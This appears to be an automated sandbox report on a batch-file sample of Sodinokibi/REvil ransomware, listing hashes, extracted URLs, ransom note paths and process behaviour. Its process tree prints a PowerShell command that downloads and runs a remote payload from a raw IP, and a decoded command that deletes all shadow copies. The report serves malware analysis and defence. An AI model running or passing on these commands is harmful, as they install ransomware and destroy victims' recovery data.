Analysis

- max time kernel: 107s
- max time network: 120s
- platform: windows7_x64
- resource: win7v200410
- submitted: 22-04-2020 18:10
Tasks

- Static task: static1
- Behavioral task: behavioral1
  Sample: Me2v4MuS.bat
  Resource: win7v200410
- Behavioral task: behavioral2
  Sample: Me2v4MuS.bat
  Resource: win10v200410
General

- Target: Me2v4MuS.bat
- Size: 197B
- MD5: 9fe4e52640dd89fd2bffd7679d5427c1
- SHA1: cb782152f0425e231fc8a2e8efa34a0fb13b07a9
- SHA256: 431072d009a13cdfad92609c787cd58680f40d778bb435bf6c6eb29edc7558a0
- SHA512: f9507bfd78c53ec37cb98e3060f4f88ef6326493cc1dcd7c9248c71005495a3a5e97d0ef27a95ee79c3128ac7993e97483b1d2fbdffbabf627bab9386d7079be
Malware Config

Extracted (stage-2 download URL)
  http://185.103.242.78/pastes/Me2v4MuS

Extracted (ransom note and payment URLs)
  Path: C:\6n56wyp030-readme.txt
  Family: sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F103D4F6A74E6F10
  http://decryptor.cc/F103D4F6A74E6F10
Signatures

- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes (pid, process):
  2040  powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes (description, pid, process, target pid, target process):
  wrote to memory of  2016  cmd.exe         ->  2040  powershell.exe
  wrote to memory of  2040  powershell.exe  ->  1412  powershell.exe
  wrote to memory of  2040  powershell.exe  ->  1412  powershell.exe
  wrote to memory of  2040  powershell.exe  ->  1412  powershell.exe
  wrote to memory of  2040  powershell.exe  ->  1412  powershell.exe
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes (token, pid, process):
  SeDebugPrivilege          2040  powershell.exe
  SeDebugPrivilege          2040  powershell.exe
  SeDebugPrivilege          1412  powershell.exe
  SeBackupPrivilege         1568  vssvc.exe
  SeRestorePrivilege        1568  vssvc.exe
  SeAuditPrivilege          1568  vssvc.exe
  SeTakeOwnershipPrivilege  2040  powershell.exe
- Drops file in Program Files directory (16 IoCs)
  Processes (description, ioc; all by powershell.exe):
  File opened for modification  \??\c:\program files\ConvertToRestore.ttc
  File created                  \??\c:\program files\microsoft sql server compact edition\6n56wyp030-readme.txt
  File opened for modification  \??\c:\program files\UpdateUnpublish.xht
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\6n56wyp030-readme.txt
  File created                  \??\c:\program files\6n56wyp030-readme.txt
  File created                  \??\c:\program files (x86)\6n56wyp030-readme.txt
  File opened for modification  \??\c:\program files\EnableSync.edrwx
  File opened for modification  \??\c:\program files\SaveRepair.emz
  File opened for modification  \??\c:\program files\SuspendGet.odt
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\6n56wyp030-readme.txt
  File opened for modification  \??\c:\program files\CompleteUninstall.dotx
  File opened for modification  \??\c:\program files\DisableUndo.au3
  File opened for modification  \??\c:\program files\RegisterUnregister.mpg
  File opened for modification  \??\c:\program files\JoinClear.pptm
  File opened for modification  \??\c:\program files\LimitGrant.snd
  File opened for modification  \??\c:\program files\SwitchUnprotect.wm
- Makes http(s) request (1 IoCs)
  Contacts server via http/https, possibly for C2 communication.
  Processes (description, flow, ioc):
  HTTP URL  3  http://185.103.242.78/pastes/Me2v4MuS
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes (pid, process):
  2040  powershell.exe
  2040  powershell.exe
  2040  powershell.exe
  1412  powershell.exe
  1412  powershell.exe
- Blacklisted process makes network request (1 IoCs)
  Processes (flow, pid, process):
  3  2040  powershell.exe

- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes (description, ioc; all by vssvc.exe):
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes (description, ioc, process):
  Set value (str)  \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\740t6949c.bmp"  powershell.exe

- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Me2v4MuS.bat"
  PID: 2016
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Me2v4MuS');Invoke-BXOVRYVWNFYNYU;Start-Sleep -s 10000"
    PID: 2040
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64 UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of all Volume Shadow Copies, which explains the vssvc.exe activity below)
      PID: 1412
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1568
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service